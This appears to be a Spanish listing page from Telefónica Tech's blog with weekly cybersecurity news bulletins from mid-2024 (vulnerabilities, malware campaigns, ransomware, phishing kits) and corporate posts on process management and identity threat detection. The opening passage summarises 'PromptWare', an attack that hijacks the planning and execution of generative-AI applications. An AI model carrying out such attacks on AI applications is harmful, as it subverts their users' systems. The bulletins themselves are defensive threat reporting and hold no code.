zero-click que no requiere interacción con el usuario y que dirige sus acciones contra las arquitecturas de planificación y ejecución del modelo de inteligencia artificial. Asimismo, en el artículo se detallan dos posibles formas de implementación de PromptWare, diferenciando entre cuando el atacante conoce la lógica de la aplicación atacada y cuando no lo hace, demostrado en ambos casos las capacidades maliciosas de esta nueva técnica. Más info Campaña suplantando a Google que distribuye malware Latrodectus y ACR Stealer El equipo de investigadores de Cyble ha publicado una investigación en la que informan sobre una campaña que suplanta la página oficial del Centro de seguridad de Google con el objetivo de distribuir malware como Latrodectus y ACR Stealer. En concreto, el actor tras estos hechos trata de engañar a sus víctimas para descargar un archivo que simula ser Google Authenticator. Sin embargo, una vez que se ejecuta el archivo da comienzo la infección de dos tipos de malware. Por una parte, ACR Stealer que utiliza una técnica conocida como Dead Drop Resolver (DDR) para evitar ser detectado y se encarga de extraer información del equipo, así como permite facilitar la comunicación con su servidor de comando y control (C&C). Por otra parte, se despliega Latrodectus, un descargador que se caracteriza por disponer de varias funciones de evasión, así como de disponer de un cifrado actualizado y nuevos comandos de acción que ponen de relieve el desarrollo de esta herramienta. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
9 de agosto de 2024
Boletín de Ciberseguridad, 27 julio - 2 agosto
Microsoft Azure sufre ataque de DDoS La compañía Microsoft ha confirmado que el incidente que paralizó e interrumpió varios servicios de la compañía como Microsoft 365 y Azure en todo el mundo, fue producido por un ataque de denegación de servicio distribuido (DDoS). Según un comunicado de Microsoft, estos hechos se debieron al resultado de un ataque de DDoS, del cual por el momento se desconoce su atribución, y que se amplificó debido a un posible error en la implementación de las medidas de defensa utilizadas por la compañía. Cabe indicar que dicho incidente tuvo una duración de aproximadamente 10 horas, por lo que numerosas compañías de diferentes sectores que utilizan estos activos se vieron afectados. En base a estos hechos, Microsoft ha indicado que publicará en un plazo de 72h un análisis preliminar sobre este incidente y una revisión más detallada dentro de 2 semanas. Más info Campaña de phishing “OneDrive Pastejacking” dirigida a Microsoft OneDrive Investigadores de ciberseguridad de Trellix han detectado una nueva campaña de phishing denominada “OneDrive Pastejacking” dirigida a usuarios de Microsoft OneDrive en Estados Unidos, Corea del Sur, Alemania, India, Irlanda, Italia, Noruega y Reino Unido. Su objetivo es que los usuarios ejecuten, a través de técnicas de ingeniería social, un script malicioso de PowerShell. El ataque se desarrolla mediante el envío de un correo electrónico que contiene un fichero HTML. Al ejecutarse, el archivo muestra una imagen que simula ser una página de OneDrive, además de incluir un mensaje de error 0x8004de80, un fallo legítimo y real de la aplicación, solicitando al usuario que actualice la caché DNS manualmente para solventarlo junto a unas instrucciones. Si el usuario accede a estas, se le solicita seguir una serie de pasos que, en última instancia, incluyen iniciar PowerShell y pegar un comando codificado en Base64 para, aparentemente, solucionar el supuesto problema. Más info Vulnerabilidad en los hipervisores ESXi explotada para desplegar ransomware Una vulnerabilidad recientemente descubierta que afectaría a los hipervisores ESXi estaría siendo explotada por grupos de ransomware. De acuerdo con Microsoft, el fallo CVE-2024-37085, CVSSv3 6.8 según VMware, sería de tipo authentication bypass y permitiría a los atacantes obtener acceso administrativo al hipervisor, lo que a su vez les permitiría cifrar el sistema, acceder a máquinas virtuales y moverse lateralmente. Aunque Microsoft alertó a VMware de esta vulnerabilidad, lo que propició la publicación de parches, actores maliciosos como Storm-0506, Storm-1175, Octo Tempest y Manatee Tempest habrían estado explotando dicho fallo en diversos ataques. En concreto, los investigadores destacan que los atacantes ejecutaban una serie de comandos para crear un nuevo grupo llamado ESX Admins en el dominio, culminando en múltiples ocasiones en el despliegue de los ransomware Akira y BlackBasta. Más info Explotada una configuración errónea de Proofpoint en campaña masiva de phishing Recientemente se conoció una campaña masiva de phishing en la que actores de amenazas explotaron una configuración errónea en el servicio de protección de correo electrónico de Proofpoint. Denominada EchoSpoofing, esta falla de seguridad permitió a los actores de amenazas enviar millones de correos electrónicos de phishing perfectamente autenticados y firmados, aprovechando la base de clientes de Proofpoint, incluyendo empresas y marcas conocidas como Disney, IBM, Nike, Best Buy y Coca-Cola, y distribuyendolos a través de Microsoft Exchange. Según Guardio Labs, los atacantes usaron cuentas de Office365 controladas por ellos y aprovecharon la configuración permisiva del servidor de distribucción de Proofpoint. Los correos de phishing se creaban en servidores virtuales, pasaban por Office365 y Proofpoint, lo que los hacía parecer genuinos. Además, para el éxito del ataque, los atacantes se valieron de un ID único de la marca falsificada, obtenido del registro MX público. La campaña, que tuvo su origen en enero de 2024, llegó a enviar hasta 14 millones de correos diarios. Proofpoint fue notificada en mayo acerca del problema e indicó que estaban al tanto de los hechos desde marzo y que habían desplegado mitigaciones y alertado a sus clientes. Sin embargo, muchas cuentas comprometidas de Office365 utilizadas en el ataque siguen sin parchear. Más info GXC Team: actor malicioso de habla hispana siguiendo modelo de MaaS El equipo de investigadores de Group-IB ha realizado una publicación en la que analizan a un actor malicioso de habla hispana que ofrece servicios de Malware as a Service (MaaS) denominado GXC Team. En concreto, dicho actor fue descubierto en septiembre de 2023, aunque habría iniciado sus acciones en enero del mismo año. Asimismo, destacan que sus servicios afectan a bancos españoles y organismos gubernamentales e instituciones a nivel global. GXC Team ofrece a sus clientes una combinación de kits de phishing y un malware dirigido contra sistemas Android, el cual se trata de un ladrón de OTP de SMS. No obstante, lo más destacado de este servicio de MaaS es su sofisticada plataforma de phishing como servicio impulsado por inteligencia artificial capaz de generar llamadas de voz a sus víctimas en función de sus indicaciones. En último lugar, cabe indicar que desde Group-IB alertan que, a pesar de que sus herramientas no son muy sofisticadas, las características innovadoras de GXC Team pueden ser una amenaza para la seguridad del sector bancario en España. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
2 de agosto de 2024
El compromiso con la excelencia: un factor clave para la transformación digital
En Telefónica Tech nos hemos consolidado como un referente en el ámbito de la transformación digital y de las tecnologías de la información. El compromiso con la excelencia se manifiesta en cada uno de los procesos desarrollados y en todas las operaciones, desde la innovación en servicios tecnológicos hasta la implementación de soluciones de Ciberseguridad, Cloud, IoT y Big Data. Con este compromiso no solo buscamos ofrecer los mejores productos y servicios, sino también garantizar una calidad excepcional a todos los niveles. Aseguramiento de procesos En Telefónica Tech trabajamos estrechamente con todas las áreas de negocio para definir y documentar cada proceso, asegurando la agregación de valor real y tangible. Esta estrecha colaboración garantiza que cada proceso no solo soporte las operaciones diarias, sino que también contribuya con la ventaja competitiva a largo plazo. La colaboración entre las áreas de negocio es clave para definir y documentar procesos que aporten valor real, apoyen las operaciones diarias y fortalezcan la competitividad a largo plazo. Cada proceso, desde su conceptualización hasta su aprobación y publicación, se somete a una revisión exhaustiva para garantizar su eficacia. Este riguroso flujo de aprobación involucra a múltiples stakeholders, incluyendo el propietario del proceso, el equipo de calidad, y la dirección ejecutiva. Solo tras su completa validación se considera listo para ser implementado. Garantía de calidad La calidad es un pilar fundamental de nuestra estrategia en Telefónica Tech. Para garantizar estos aspectos, implementamos diversas prácticas y metodologías. Gestión de calidad total: con un enfoque integral hacia la gestión de calidad, asegurando que cada etapa del proceso, desde la concepción hasta la implementación y el soporte, cumpla con los más altos estándares de calidad. Certificaciones y estándares: nos adherimos a las certificaciones internacionales y estándares de la industria, como ISO 9001 para gestión de calidad e ISO 27001 para gestión de la seguridad de la información. Estas certificaciones no solo demuestran nuestro compromiso con la excelencia, sino que también proporcionan confianza a los clientes. Monitoreo y mejora continua: A través de sistemas de monitoreo avanzados y análisis de datos, en Telefónica Tech podemos identificar áreas de mejora y realizar ajustes proactivos. La mejora continua es una parte integral de su enfoque para mantener la consistencia y calidad en todos sus servicios. Sostenibilidad y responsabilidad social Nuestro compromiso con la excelencia en Telefónica Tech también incluye una fuerte dedicación a la sostenibilidad y la responsabilidad social, aplicando esfuerzos a minimizar su impacto ambiental y contribuir positivamente a la sociedad. Tecnologías Sostenibles: promovemos el uso de tecnologías que reducen el consumo energético y las emisiones de carbono, contribuyendo así a la lucha contra el cambio climático. Iniciativas Sociales: participamos en diversas iniciativas de responsabilidad social, apoyando programas educativos y comunitarios que fomentan el desarrollo tecnológico y la inclusión digital. Como conclusión, nuestro compromiso con la excelencia en Telefónica Tech no es solo una declaración, sino una realidad palpable en su día a día. A través de la transformación digital y el aseguramiento de los procesos, la garantía de calidad, y su enfoque en la sostenibilidad y responsabilidad social, en Telefónica Tech nos posiconamos como una referencia en el sector tecnológico, ofreciendo soluciones que no solo cumplen con las expectativas de los clientes, sino que también contribuyen a un futuro más sostenible y equitativo. La búsqueda constante de la excelencia es el motor que nos impulsa hacia nuevos horizontes y mayores logros. ◾ MÁS DE ESTA SERIE Telefónica Tech La importancia de la gestión por procesos en las empresas 18 de junio de 2024 Telefónica Tech Mapa de Procesos: herramienta clave en la gestión por procesos 3 de julio de 2024 Imagen: Freepik.
23 de julio de 2024
Boletín de Ciberseguridad, 13 - 19 julio
Nuevas vulnerabilidades en Ivanti La compañía Ivanti ha emitido un nuevo aviso de seguridad en donde corrige hasta cuatro nuevas vulnerabilidades en sus productos Endpoint Manager y Endpoint Manager for Mobile. Entre estos fallos, destaca el registrado como CVE-2024-37381, CVSSv3 de 8.8 según fabricante, que afecta al servidor central de Endpoint Manager (EPM) 2024 flat que podría ser explotada por atacantes autenticados con acceso a la red para ejecutar código arbitrario. Cabe indicar que Ivanti ha publicado una revisión para esta vulnerabilidad, aplicable solo a EPM 2024 flat, y se planean actualizaciones de seguridad que aborden este fallo en futuras versiones. Consecuentemente, Ivanti ha corregido otras vulnerabilidades que afectan a todas las versiones de su Endpoint Manager for Mobile (EPMM), en concreto CVE-2024-36130, CVSSv3 de 8.8 según fabricante, CVE-2024-36131, CVSSv3 de 8.2 según fabricante y CVE-2024-36132, CVSSv3 de 5.3 según fabricante, las cuales se corrigen en las versiones 11.12.0.3, 12.0.0.3 y 12.1.0.1 de EPMM. Más info Vulnerabilidad crítica en Cisco SSM On-Prem La compañía Cisco ha emitido un aviso de seguridad en donde informa sobre una vulnerabilidad crítica que afecta a Cisco Smart Software Manager On-Prem. En concreto, el fallo de seguridad ha sido registrado como CVE-2024-20419, CVSSv3 de 10 según fabricante, y es causado por una vulnerabilidad de cambio de contraseña no verificada en el sistema de autenticación de SSM On-Prem. Un atacante remoto no autenticado podría aprovechar esta vulnerabilidad para establecer nuevas contraseñas de usuario sin conocer las credenciales originales. Cabe indicar que este afecta a las versiones de SSM On-Prem anteriores a la versión 7.0, a las cuales se les conoce como Cisco Smart Software Manager Satellite (SSM Satellite). Desde Cisco, recomiendan a sus usuarios actualizar a la última versión dicho activo e indican que no han identificado exploits públicos o intentos de explotación dirigidos a esta vulnerabilidad. Más info El 67% de empresas en el sector energético recibieron ataques de ransomware Sophos ha publicado su informe de 2024 sobre el Estado del Ransomware en Infraestructuras Críticas, en el que se destaca que en el último año el 67% de las organizaciones del sector de energía, petróleo y gas recibieron ataques de ransomware. Sophos destaca que la mitad de los ataques exitosos se realizaron a través de la explotación de vulnerabilidades no parcheadas o mitigadas. Más info Atomic Stealer para Mac en copias falsas de Teams Malwarebytes ha advertido de la existencia de una campaña de distribución del malware Atomic Stealer a través de URLs ilegítimas que suplantan a Microsoft cuando el usuario busca en Google el software Teams. El actor de la amenaza logró que en la página de resultados su web maliciosa apareciese como la oficial de Microsoft, aportando credibilidad a la estafa. En la campaña detectada por Malwarebytes la URL descarga una copia falsa de Teams para Mac infectada con Atomic Stealer. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
19 de julio de 2024
La importancia de la Detección y Respuesta de Amenazas en el ámbito de la identidad
En el panorama actual de ciberseguridad, la identidad se ha convertido en uno de los vectores más críticos para las amenazas. Los atacantes se centran cada vez más en comprometer identidades para acceder a sistemas y datos sensibles. El robo de identidad en el mundo digital puede tener consecuencias devastadoras. Los ciberdelincuentes pueden utilizar credenciales comprometidas para acceder a redes corporativas, realizar fraudes, exfiltrar datos sensibles y desplegar ataques adicionales. La dificultad radica en que las identidades robadas permiten a los atacantes moverse lateralmente y mantener una presencia prolongada sin ser detectados. Tipos de ataques a las identidades Las técnicas más comunes utilizadas por los atacantes para robar o comprometer las identidades se encuentran: Phishing: los atacantes utilizan correos electrónicos fraudulentos para engañar a los usuarios y obtener sus credenciales. Credential stuffing: se utilizan combinaciones de usuario y contraseña robadas de una brecha de datos en múltiples servicios. Ataques de fuerza bruta: el atacante intenta adivinar contraseñas mediante la prueba de múltiples combinaciones. Con la proliferación de herramientas robotizadas, este ataque es fácilmente implementable. Secuestro de Sesión o hijacking: el atacante toma el control de una sesión activa de un usuario para realizar acciones en su nombre. Esto es posible interceptando la comunicación entre la sesión del usuario y el servidor mediante técnicas de sniffing (inspección de tráfico, captura de cookies o reutilización de tokens de sesión. Esto pudiera ocurrir en navegación web a través de redes wi-fi públicas poco seguras o aplicaciones webs vulnerables. Tipologías de identidades Con la adopción de cada vez más servicios tecnológicos que ofrece la nube y de la implementación de procesos robotizados dentro de las compañías, la tipología de identidades ha ido evolucionando en los últimos tiempos, por lo que existen otros tipos de identidades que pueden ser objeto de ataques. De esta manera, prestar atención exclusivamente a la seguridad de las Identidades de Usuario (cuentas de empleados y contratistas que acceden a sistemas y datos) no es suficiente, pues se ha hecho necesario garantizar también la protección de identidades de Servicio: cuentas utilizadas por aplicaciones y servicios para comunicarse entre sí. Máquina: certificados y claves utilizados por dispositivos y máquinas para autenticarse. Privilegiadas: cuentas con permisos elevados, como administradores de sistemas y bases de datos. Estas identidades, que se utilizan para facilitar la comunicación entre aplicaciones y servicios en la nube o en entornos robotizados, también requieren de medidas de seguridad específicas, ya que pueden comprometer la integridad y confidencialidad de los datos y procesos de las organizaciones. Servicio MDR de Telefónica Tech Sabemos que mantenerse al día de las sofisticadas amenazas del mundo de la identidad es una labor compleja y costosa, y es por ello por lo que en Telefónica Tech hemos añadido a nuestro servicio de Managed Detection and Response (MDR) la detección y respuesta ante amenazas en identidades. En Telefónica Tech hemos integrado en su servicio MDR la detección y respuesta a amenazas de identidad, aprovechando la experiencia de sus analistas y la inteligencia de amenazas. Gracias a este módulo, el cliente se beneficiará de la amplia experiencia de los analistas de seguridad de Telefónica Tech, de nuestra inteligencia de amenazas, de los automatismos de desarrollo propio y de las capacidades de las plataformas de xDR más avanzadas que utilizamos para reducir la superficie de ataque de las identidades y para detectar, investigar y responder de forma ágil y efectiva ante comportamientos anómalos de las identidades que amenacen la seguridad de su empresa. De este modo evitamos que los ciberdelincuentes puedan acceder a información sensible, realizar operaciones fraudulentas o causar daños a la reputación y la confianza de nuestros clientes. Además, proporcionamos informes periódicos con las principales métricas, hallazgos y recomendaciones para mejorar la seguridad de las identidades de nuestros clientes. ✅ Con el servicio Detección y Respuesta Gestionada (MDR) de Telefónica Tech nuestros clientes tienen una visión completa de su exposición a las amenazas, una respuesta rápida y coordinada a los incidentes, una reducción de los costes y los riesgos asociados a las brechas de seguridad y una mejora de su nivel de madurez y confianza en el entorno digital. AUTOR Equipo de producto de Extended Detection & Response * * * Cyber Security Protege tu marca: Cómo evitar la suplantación de dominios en el correo electrónico 12 de marzo de 2024
16 de julio de 2024
Boletín de Ciberseguridad, 6 - 12 julio
Microsoft parchea 142 vulnerabilidades en el Patch Tuesday de julio Con motivo del Patch Tuesday del mes de julio, Microsoft ha publicado parches para 142 vulnerabilidades, incluyendo cuatro 0-days, 2 de ellas explotados activamente. De entre todos los fallos parcheados destacan los siguiente al ser considerados críticos al permitir a los atacantes ejecutar código remoto, entre las que se incluirían CVE-2024-38074, CVE-2024-38076 y CVE-2024-38077, todas con CVSSv3 9.8 según Microsoft y afectarían a Windows Remote Desktop Licensing Service. Asimismo, las cuatro 0-days parcheadas serían las denominadas CVE-2024-38080 (CVSSv3 7.8 según proveedor), CVE-2024-38112 (CVSSv3 7.5 según proveedor), CVE-2024-35264 (CVSSv3 8.1 según proveedor) y CVE-2024-37985. Estas permitirían a los actores maliciosos elevar sus privilegios Hyper-v en varias versiones de Windows 11, llevar a cabo ataques de spoofing a la plataforma MSHTML, ejecutar código .NET y Visual Studio de forma remota y ver la memoria heap de un proceso con privilegios que se ejecuta en el servidor de productos Windows 11 versión 22H2, respectivamente. Más info Zergeca: nueva botnet diseñada para ataques DDoS Investigadores de QiAnXin XLab descubrieron una nueva botnet basada en Golang llamada Zergeca, diseñada para realizar ataques DDoS. La botnet utiliza múltiples métodos de resolución DNS y prioriza DNS sobre HTTPS para el C2, utilizando la biblioteca Smux para comunicación cifrada. Además, consta de cuatro módulos conocidos como persistencia, proxy, silivaccine y zombie, siendo este último el núcleo de la botnet, encargado de reportar información y ejecutar comandos. Asimismo, Zergeca mantiene la persistencia en dispositivos comprometidos mediante el servicio geomi.service, que genera nuevos procesos si se reinicia el dispositivo. El análisis realizado concluyó que Zergeca cuenta con capacidades avanzadas, incluyendo proxy, escaneo, autoactualización, persistencia, transferencia de archivos, shell inverso y recopilación de información sensible. Además, se observó que su dirección IP C2 ha estado vinculada a la botnet Mirai desde 2023, sugiriendo que su creador tiene experiencia previa en operar estas redes. Más info Nuevo kit de phishing FishXProxy El equipo de investigadores de SlashNext Email Security ha publicado una investigación en la que se detalla un nuevo kit de phishing al que se ha denominado FishXProxy. Según los expertos, es una herramienta peligrosa que está diseñada para crear y administrar sitios de phishing con el objetivo de evadir la detección y maximizar la tasa de éxito sin que el usuario requiera de conocimientos técnicos. Entre sus características más destacadas es que la misma ofrecería una amplia gama de funciones avanzadas como configuraciones antibot, integración de Cloudflare Turnstile, redirecciones integrado y configuraciones de expiración de páginas. Asimismo, dicho kit ofrece a aquellos usuarios que contraten esta plataforma actualizaciones y soporte. Más info Detectada campaña de ciberespionaje de APT patrocinada por China Actores de amenazas del grupo APT40, patrocinado por China, están secuestrando routers SOHO para lanzar ataques de ciberespionaje contra entidades gubernamentales, según se indica en un aviso conjunto de agencias de ciberseguridad internacionales. APT40, activo desde al menos 2011, ha atacado organizaciones gubernamentales y privadas utilizando vulnerabilidades en software como Microsoft Exchange y WinRAR; y además utilizan web shells y técnicas como Kerberoasting y RDP para moverse lateralmente dentro de las redes comprometidas. En esta nueva campaña observada, estarían utilizando routers SOHO (Small Office, Home Office) al final de su vida útil, valiéndose de vulnerabilidades N-day con la finalidad de secuestrarlos y que actúen como proxies, para lanzar ataques mientras se mezclan con el tráfico legítimo. En fases finales del ataque, APT40 exfiltra datos a servidores C2 y mantiene una presencia sigilosa. Finalmente, el aviso recomienda parches oportunos, registro exhaustivo, segmentación de red y reemplazo de equipos EoL para defenderse ante estos ataques. Más info Campaña activa de Poco RAT contra organizaciones latinoamericanas Cofense ha identificado una campaña de un nuevo malware denominado Poco RAT dirigida contra víctimas geolocalizadas en Latinoamérica en el contexto, principalmente, del sector minero. La campaña, que llevaría operando desde febrero de 2024, se propaga generalmente a través de correos electrónicos con pretextos financieros que contienen por lo general enlaces a archivos 7zip alojados en Google Drive. Estos correos pueden incluir un enlace directo, un enlace en un archivo HTML o un enlace en un PDF adjunto. Una vez ejecutada y establecida la persistencia a través de una clave de registro, la aplicación se comunica contra un mismo C2 que solo responde si el equipo está localizado en Latinoamérica. Entre las funcionalidades identificadas se encuentra la capacidad para descargar y ejecutar otras aplicaciones y la posibilidad no ampliamente explotada de acceder a credenciales del equipo y la entrada de usuario. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
12 de julio de 2024
Boletín de Ciberseguridad, 29 junio - 5 julio
Google parchea vulnerabilidades en Android La compañía Google ha lanzado una actualización de seguridad para el sistema Android que corrige un total de 25 vulnerabilidades, de entre las cuales destaca una considerada como crítica. En concreto, dicho fallo de seguridad ha sido registrado como CVE-2024-31320 que afecta al componente Framework y cuyo aprovechamiento podría producir una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales. Cabe indicar que esta vulnerabilidad afecta a las versiones de Android 12 y 12L, además de que también se han abordado otros siete problemas de alta gravedad en dicho activo. Por otra parte, se han resuelto otras 17 vulnerabilidades en componentes Kernel, Arm, Imagination Technologies, MediaTek y Qualcomm. Google recomienda a los usuarios para actualizar los dispositivos para corregir estas vulnerabilidades. Más info Velvet Ant explota vulnerabilidad en Cisco NX-OS para distribuir malware Recientemente, la firma de seguridad Sygnia informó que el grupo de ciberespionaje chino conocido como Velvet Ant está explotando una vulnerabilidad 0-day en el software Cisco NX-OS para distribuir malware. La falla, identificada como CVE-2024-20399 y con una puntuación CVSSv3 de 6.0 según fabricante, permite a un atacante local autenticado ejecutar comandos arbitrarios como root en los switches Cisco Nexus afectados. Según los expertos, Velvet Ant ha utilizado esta vulnerabilidad para desplegar malware personalizado que le permite conectarse remotamente a los dispositivos comprometidos, cargar archivos adicionales y ejecutar código. Por su parte, Cisco ha declarado que la vulnerabilidad se debe a una insuficiente validación de los argumentos en los comandos CLI de configuración, permitiendo a un usuario con privilegios de administrador ejecutar comandos sin generar mensajes syslog. Asimismo, ha lanzado actualizaciones de software para corregir esta vulnerabilidad, ya que no existen soluciones alternativas. Más info Juniper corrige una vulnerabilidad critica de evasión de autenticación Juniper Networks ha lanzado una actualización de emergencia para solucionar una vulnerabilidad que permite eludir la autenticación en los productos Session Smart Router (SSR), Session Smart Conductor y WAN Assurance Router. Este fallo de seguridad, identificado como CVE-2024-2973 y con una puntuación CVSSv3 de 10.0 según fabricante, afecta a configuraciones redundantes de alta disponibilidad, y permite a un atacante eludir la autenticación y tomar el control total del dispositivo. La actualización se ha publicado en las versiones 5.6.15, 6.1.9-lts, 6.2.5-sts y posteriores para SSR. En los entornos gestionados por Conductor, basta con actualizar sólo los nodos Conductor y la corrección se aplicará automáticamente a todos los routers conectados. En cuanto a WAN Assurance Routers, las actualizaciones se aplicarán automáticamente cuando están conectados a Mist Cloud. Por su parte, Juniper garantiza que la actualización no interrumpe el tráfico de producción y, aunque afirma no tener conocimiento de ninguna explotación activa de esta vulnerabilidad, recomienda aplicar las correcciones disponibles. Más info FakeBat es distribuido mediante técnicas drive-by download FakeBat, también denominado EugenLoader y PaykLoader, es uno de los malware de tipo loader que más relevancia ha ganado en 2024, de acuerdo con una investigación publicada por Sekoia. Este malware se distribuye mediante la técnica drive-by download, empleando campañas de malvertising, actualizaciones de navegadores, ingeniería social y páginas maliciosas suplantando software legítimo, incluyendo AnyDesk y Google Chrome. Asimismo, FakeBat actúa como Malware-as-a-Service (MaaS), desplegando las payloads de otros malware como IcedID, Lumma o Redline. Con respecto a su infraestructura de C2, los investigadores identificaron varios servidores empleados por los actores de amenazas para este cometido, así como para llevar a cabo tácticas de elusión de detección, incluyendo el filtrado de tráfico basado en valores User-Agent y direcciones IP. Más info Operadores de ransomware amenazan a sus víctimas con llamadas telefónicas El equipo de investigadores de Halcyon ha publicado una investigación en la que señala que un nuevo grupo de ransomware, denominado Volcano Demon, estaría utilizando llamadas telefónicas para extorsionar a sus víctimas. Según los expertos, dicho actor emplearía técnicas de doble extorsión y llevaría al menos dos ataques a empresas de logística e industria infectándolas con el ransomware LukaLocker. En cuanto a lo destacado del caso es que estos operadores de ransomware no disponen de un sitio web de filtraciones de información, sino que utilizan llamadas telefónicas casi diarias mediante números no identificados amenazando a sus víctimas. Cabe indicar que desde Halcyon no han podido confirmar si Volcano Demon opera de forma independiente, o si se trataría de una filial de algún grupo conocido de ransomware. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
5 de julio de 2024
Mapa de Procesos: herramienta clave en la gestión por procesos
En el mundo empresarial actual, la eficiencia y la entrega de valor son esenciales para el éxito. Las organizaciones deben gestionar sus operaciones de manera efectiva para mantenerse competitivas y satisfacer las necesidades de sus clientes. En este contexto, los procesos empresariales desempeñan un papel fundamental. ¿Qué es un proceso? Un proceso se refiere a una secuencia de actividades interrelacionadas que se llevan a cabo para lograr un objetivo específico. Los procesos son fundamentales para la operación eficiente y la entrega de valor a los clientes. De manera complementaria y siguiendo la definición del autor James Harrington, un proceso es “cualquier actividad que recibe una entrada (input), le agrega valor y genera una salida (output) para un cliente, haciendo uso de los recursos de la organización para generar resultados concretos”. Los procesos tienen ciertas características clave: Secuencialidad: implica una secuencia ordenada de pasos o fases que se ejecutan en un determinado orden. Entradas y salidas: cada proceso tiene entradas (materiales, información, recursos) y produce salidas (productos, resultados, información procesada). Objetivo: Los procesos están diseñados para lograr un objetivo específico. Alcance: define hasta dónde se extiende el proceso dentro de la organización. Roles y responsabilidades: son las figuras fundamentales para el correcto funcionamiento y para garantizar que las actividades se realicen de manera eficiente y efectiva. Sistemas: son los recursos usados como soporte en la ejecución de las distintas actividades. Riesgos y oportunidades: entendidos como los efectos de la incertidumbre. En otras palabras, es la desviación positiva o negativa frente a lo esperado. Elementos de control: establecidos para asegurar que el proceso funcione eficientemente de acuerdo a lo planeado. El control puede incluir indicadores de desempeño y mecanismos para corregir desviaciones. ¿Qué es un mapa de procesos? Los procesos no son independientes, en última instancia, todos persiguen el mismo fin, que es el progreso y la prosperidad de la compañía, aunque cada uno funcione en un ámbito de acción específico. Unos procesos se vinculan con otros para, en conjunto, alcanzar ese objetivo común. Un mapa de procesos es la representación gráfica de la manera en que se interrelacionan todos los procesos que se desarrollan dentro de la empresa. Funciona como un diagrama de valor en el que se pone de manifiesto la importancia de cada uno de ellos dentro de la maquinaria global de funcionamiento de la compañía. ¿Cómo se estructura el Mapa de Procesos de Telefónica Tech? Los procesos dentro del mapa se estructuran en tres Dominios distintos, los cuales se declinan en Áreas Funcionales: Strategy & Governance: contiene los procesos estratégicos que son cruciales para la sostenibilidad empresarial y la ventaja competitiva. Business Lifecycle: contiene los procesos primarios que agregan valor directamente al cliente. Enterprise Management: contiene los procesos de soporte que brindan valor a la compañía. En síntesis, el mapa de procesos representa una herramienta valiosa para incrementar la eficiencia y la productividad en la compañía. Facilita la comunicación entre distintos departamentos y empleados, permitiendo identificar problemas y encontrar soluciones efectivas. Además, contribuye a minimizar errores, mejorar la satisfacción del cliente y optimizar la gestión de la calidad dentro de la organización. Telefónica Tech La importancia de la gestión por procesos en las empresas 18 de junio de 2024
3 de julio de 2024
Boletín de Ciberseguridad, 22 - 28 junio
Vulnerabilidad crítica empleada para robos de tarjetas de crédito Friends-of-Presta ha publicado una Prueba de Concepto (PoC) que explotaría una vulnerabilidad crítica del complemento de Facebook para PrestaShop denominado Promokit. El fallo, CVE-2024-36680 (CVSSv3 9.8 según proveedor), habría sido inicialmente descubierto a finales de mayo, pero Promokit afirmó que ya habría sido solucionado sin aportar pruebas al respecto. En concreto, la vulnerabilidad permite llevar a cabo inyecciones SQL mediante peticiones HTTP en el script Ajax facebookConnect.php del complemento pkfacebook. Asimismo, la PoC publicada por Friends-of-Presta estaría siendo activamente empleada por actores maliciosos para desplegar un skimmer web cuyo objetivo sería la sustracción masiva de tarjetas de crédito. La empresa ha publicado una serie de mitigaciones para este fallo, debido a que los desarrolladores de Promokit no habrían compartido con ellos la última versión del complemento para comprobar si se habrían aplicado parches para CVE-2024-36680. Más info Ataque de ransomware en Londres obliga a cancelar más de 1.100 intervenciones médicas Un ataque de ransomware en Londres ha forzado la cancelación de más de 1.100 operaciones, incluidos cerca de 200 tratamientos de cáncer. El grupo de hackers Qilin ha difundido a través de Telegram más de 100 archivos comprimidos que, según afirma, contienen información confidencial obtenida de los sistemas de Synnovis, una empresa de servicios patológicos. Su objetivo es castigar a la empresa por negarse a pagar el rescate. La capacidad de los hospitales para realizar pruebas de sangre y otros procedimientos ha sido severamente afectada. El personal sanitario está trabajando para reducir el impacto, pero se espera que las interrupciones puedan durar hasta septiembre. Más info Nueva técnica de ataque denominada GrimResource El equipo de investigadores de Elastic ha realizado una publicación en la que informan sobre una nueva técnica de ataque contra sistemas Windows a la que se ha denominado GrimResource. En concreto, dicha técnica consiste en la utilización de archivos MSC (Microsoft Saved Console) especialmente diseñados concatenados con una falla XSS de Windows sin parchear en apds.dll que permitiría a actores maliciosos implementar Cobalt Strike para obtener acceso inicial en las redes de las víctimas, así como terminar realizando acciones de ejecución de código a través de Microsoft Management Console. Según los investigadores, se identificaron muestras de archivos msc maliciosos el pasado 6 de junio en VirusTotal sin que ningún motor antivirus lo catalogase como malicioso, por lo que, en base a eso, se estima que esta técnica estaría siendo aprovechada activamente por actores maliciosos. Más info Vulnerabilidad crítica en MOVEit El equipo de investigadores de Watchtowr ha publicado un análisis técnico sobre el descubrimiento de una vulnerabilidad crítica en MOVEit Transfer. En concreto, dicho fallo de seguridad ha sido registrado como CVE-2024-5806, CVSSv3 de 9.1 según fabricante, y se trata de una vulnerabilidad de omisión de autenticación en el módulo SFTP de MOVEit, cuyo aprovechamiento por parte de actores maliciosos podría permitir a los atacantes hacerse pasar por usuarios legítimos y acceder a datos confidenciales sin autenticarse. Cabe indicar que esta vulnerabilidad afecta a las versiones 2023.0.0 anteriores a 2023.0.11, 2023.1.0 anteriores a 2023.1.6 y 2024.0.0 anteriores a 2024.0.2 de MOVEit Transfer, por lo que el fabricante recomienda actualizar a las últimas versiones disponibles. Más info Posible ataque a la cadena de suministro empleando polyfill.io Durante esta semana salía a la luz una investigación de Sansec que señalaba que el servicio Polyfill estaría infectando con malware cientos de miles de sitios web. Asimismo, entre otros, Cloudflare instó a los clientes a eliminar una popular biblioteca de código abierto al considerar veraz la información señalada. A raíz de estos hechos, los actuales propietarios de polyfill.io relanzaron el servicio CDN de JavaScript en un nuevo dominio después de que se cerrara 